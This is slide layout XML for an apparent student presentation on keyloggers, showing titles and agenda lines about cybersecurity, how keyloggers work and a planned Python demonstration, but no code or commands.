            <a:chExt cx="812800" cy="698500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 8" id="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3"/>
              <a:stretch>
                <a:fillRect l="-18750" t="0" r="-18750" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 9" id="9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="2158557"/>
            <a:ext cx="6445775" cy="1229696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="9460"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8522">
                <a:solidFill>
                  <a:srgbClr val="63F1F9"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue Cyrillic"/>
              </a:rPr>
              <a:t>TITLE OF PROJECT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 10" id="10"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="4193469"/>
            <a:ext cx="6297136" cy="2283795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2626"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1876">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>Understanding Keyloggers: In-Depth Exploration of Mechanisms, Risks, and Cybersecurity Implications, Including How Keyloggers Operate, Methods of Detection, Their Impact on Personal and Organizational Security, and Strategies for Protecting Sensitive Information Against These Stealthy Cyber Threats.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194B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0301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9571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7000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1836895" y="2067808"/>
            <a:ext cx="6382297" cy="638229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29321" t="0" r="-20772" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10222194" y="2360916"/>
            <a:ext cx="4657491" cy="989330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7735"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6500">
                <a:solidFill>
                  <a:srgbClr val="29E2F9"/>
                </a:solidFill>
                <a:latin typeface="Anton"/>
              </a:rPr>
              <a:t>AGENDA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11142464" y="4510182"/>
            <a:ext cx="681771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rPr>
              <a:t>To know about what is cybersecurity and how keylogger helps.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10083491" y="4332770"/>
            <a:ext cx="736426" cy="643958"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1001412" cy="875671"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 8" id="8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1001412" cy="875671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="875671" w="1001412">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1001412" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1001412" y="875671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="875671"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="true">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="2CEEFF">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0039A6">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000"/>
            </a:gradFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 9" id="9"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="1001412" cy="923296"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="4199"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 10" id="10"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10281355" y="4510182"/>
            <a:ext cx="340698" cy="29717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Open Sans Bold"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 11" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11142464" y="5761810"/>
            <a:ext cx="4494226"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rPr>
              <a:t>To know about keylogger.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10083491" y="6689322"/>
            <a:ext cx="736426" cy="608558"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1001412" cy="827534"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 13" id="13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1001412" cy="827534"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="827534" w="1001412">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1001412" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1001412" y="827534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="827534"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="true">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="2CEEFF">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0039A6">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000"/>
            </a:gradFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 14" id="14"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="1001412" cy="875159"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="4199"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 15" id="15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10083491" y="5467121"/>
            <a:ext cx="736426" cy="736426"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1001412" cy="1001412"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 16" id="16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1001412" cy="1001412"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="1001412" w="1001412">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1001412" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1001412" y="1001412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1001412"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="true">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="2CEEFF">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0039A6">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000"/>
            </a:gradFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 17" id="17"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="1001412" cy="1049037"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="4199"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10281355" y="5677143"/>
            <a:ext cx="340698" cy="29717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Open Sans Bold"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 19" id="19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10083491" y="7783655"/>
            <a:ext cx="736426" cy="673923"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1001412" cy="916419"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 20" id="20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1001412" cy="916419"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="916419" w="1001412">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1001412" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1001412" y="916419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="916419"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="true">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="2CEEFF">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0039A6">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000"/>
            </a:gradFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 21" id="21"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="1001412" cy="964044"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="4199"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10255015" y="6752947"/>
            <a:ext cx="340698" cy="29717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Open Sans Bold"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10281355" y="8002476"/>
            <a:ext cx="340698" cy="29717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Open Sans Bold"/>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11142464" y="6831484"/>
            <a:ext cx="5528962"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rPr>
              <a:t>To implement keylogger functionality  using python.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 25" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11142464" y="7900189"/>
            <a:ext cx="5528962"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rPr>
              <a:t>Usage of keyloggers and pros and cons of it.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194B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0301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635686" y="-201962"/>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17000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="5143500"/>
            <a:ext cx="15915841" cy="5143500"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2515096" cy="812800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="2515096" cy="812800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="812800" w="2515096">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2515096" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2515096" y="812800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="812800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect l="0" t="-37028" r="0" b="-37028"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="0" y="5143500"/>
            <a:ext cx="1039108" cy="5143500"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="352887" cy="1746764"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="352887" cy="1746764"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="1746764" w="352887">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="352887" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352887" y="1746764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1746764"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="true">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="2CEEFF">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0039A6">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000"/>
            </a:gradFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 7" id="7"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="352887" cy="1775339"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="1960"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1720250" y="1629047"/>
            <a:ext cx="5292718" cy="1970405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7735"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6500">
                <a:solidFill>
                  <a:srgbClr val="29E2F9"/>
                </a:solidFill>
                <a:latin typeface="Anton"/>
              </a:rPr>
              <a:t>PROBLEM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7735"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6500">
                <a:solidFill>
                  <a:srgbClr val="29E2F9"/>
                </a:solidFill>
                <a:latin typeface="Anton"/>
              </a:rPr>
              <a:t>STATEMENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 9" id="9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9854555" y="1822406"/>
            <a:ext cx="7551539" cy="1526539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="4060"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>To know about cybersecurity and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="4060"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>To implement python program that shows </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="4060"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>how a keylogger works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5651117" y="1111981"/>
            <a:ext cx="10737703" cy="8063039"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8063039" w="10737703">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10737703" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10737703" y="8063038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8063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2899" y="799660"/>
            <a:ext cx="4123310" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4114800" w="4123310">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4123310" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4123310" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4114800"/>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01638" y="1217561"/>
            <a:ext cx="4958334" cy="8229600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8229600" w="4958334">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4958334" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4958334" y="8229600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8229600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="6839761" y="2787545"/>
            <a:ext cx="8935562" cy="195009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rPr>
              <a:t>cyber </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6843"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="11405">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="RQND Pro"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="7440743" y="4670961"/>
            <a:ext cx="7567940" cy="3533402"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3119"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2228">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
              </a:rPr>
